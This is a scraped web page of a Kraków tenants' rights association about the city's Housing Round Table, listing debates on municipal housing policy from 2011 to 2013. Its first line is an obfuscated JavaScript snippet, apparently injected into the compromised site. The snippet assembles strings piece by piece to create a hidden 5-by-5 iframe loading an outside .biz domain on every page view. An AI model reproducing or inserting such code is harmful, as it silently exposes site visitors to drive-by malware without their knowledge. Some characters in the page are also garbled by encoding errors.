jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at); O.STÓŁ MIESZKANIOWY

W dniu 21 listopada 2011 r. w trakcie I I debaty merytorycznej Okrągłego Stołu
Mieszkaniowego dotyczącej sytuacji mieszkańców skierowanych tytułami prawnymi do
prywatnych kamienic STRONA SPOŁECZNA domaga się: Więcej informacji.

 

Motto: „Wszyscy są wobec prawa równi. Wszyscy mają prawo do równego traktowania
przez władze publiczne. Nikt nie może byd dyskryminowany w życiu politycznym,
społecznym lub gospodarczym z jakiejkolwiek przyczyny” Konstytucja RP art.32 .Więcej informacji

W obradach Okrągłego Stołu Mieszkaniowego w Krakowie bierze udział 25 organizacji społecznych (wg Regulaminu OSM). Są to organizacje lokatorskie, jak i inne organizacje społeczne, które przystąpiły do OSM.

Lista organizacji lokatorskich

 

13.lutego 2012. o godzinie 17,00 w Sali Portretowej Urzędu Miasta Krakowa odbędzie się kolejna debata merytoryczna Okrągłego Stołu Mieszkaniowego. Debata ta poświęcona będzie głównie omówieniu projektu Uchwały RMK â??Wieloletni program gospodarowania mieszkaniowym zasobem Gminy Miejskiej Kraków na lata 2011-2016â??. W lipcu 2011 Rada Miasta Krakowa odstąpiła od uchwalenia tego programu do czasu uzyskania opinii Okrągłego Stołu Mieszkaniowego. Przygotowany program jest niezmiernie ważnym dokumentem dla wszystkich mieszkańców Krakowa, na podstawie którego opracowywana jest Polityka mieszkaniowa Gminy Miejskiej Kraków oraz ustalane są plany nakładów pieniężnych w budżecie na kolejne lata przeznaczanych na gminne budownictwo mieszkaniowe w Krakowie. Zadaniem trony Społecznej OSM jest przygotowanie i publiczne przedstawienie oceny dotychczas obowiązującego Programu na lata 2007-2012 i jego wykonania za poprzednie lata, oraz stwierdzenie, czy takie same błędne założenia znajdują się w Programie, przygotowanym przez Urząd Miasta Krakowa na lata następne.

Serdecznie zapraszamy!

Okrągły Stół Mieszkaniowy (OSM) w Krakowie został powołany Uchwałą Nr XXI/235/11 Rady Miasta
Krakowa, z dnia 6 lipca 2011 r. Więcej informacji.

 

Kolejna debata OSM odbędzie się w poniedziałek 15.04.2013 r. godz. 17 UM Krakowa pl. Wszystkich
Świętych 3-4.Więcej informacji

 

 

Jako uczestnik Okrągłego Stołu Mieszkaniowego /OSM/ , w związku z wielokrotnymi wnioskami składanymi przez OSM do Prezydenta i Rady Miasta w sprawie przeznaczenia odpowiednich sum w budżecie na budownictwo mieszkaniowe komunalne pozwalam sobie zwrócić się do Pana jako Radnego oraz Przewodniczącego Komisji Mieszkalnictwa z zapytaniem.Więcej

 

WYBORY 2018

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.